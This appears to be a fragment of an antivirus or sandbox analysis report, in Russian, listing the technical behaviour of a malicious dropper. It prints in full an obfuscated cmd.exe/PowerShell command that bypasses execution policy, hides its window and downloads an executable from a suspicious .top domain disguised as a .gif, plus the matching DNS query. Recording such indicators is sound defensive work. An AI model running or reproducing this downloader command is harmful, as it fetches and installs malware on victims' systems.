Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWERshEll.EXe -exEcUtIOnpOLicY BYPaSS -noPrOfiLE -WiNDOWStYle HIDDEn (neW-OBjECt SYSTem.Net.wEBcLIEnT).DOwNLoAdFILe('http://www.basopoew.top/read.php?f=1.gif','%APpdAtA%.exe');...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /c "POWERshEll.EXe -exEcUtIOnpOLicY BYPaSS -noPrOfiLE -WiNDOWStYle HIDDEn (neW-OBjECt SYSTem.Net.wEBcLIEnT).DOwNLoAdFILe('http://www.basopoew.top/read.php?f=1.gif','%APpdAtA%.exe');...' (со скрытым окном)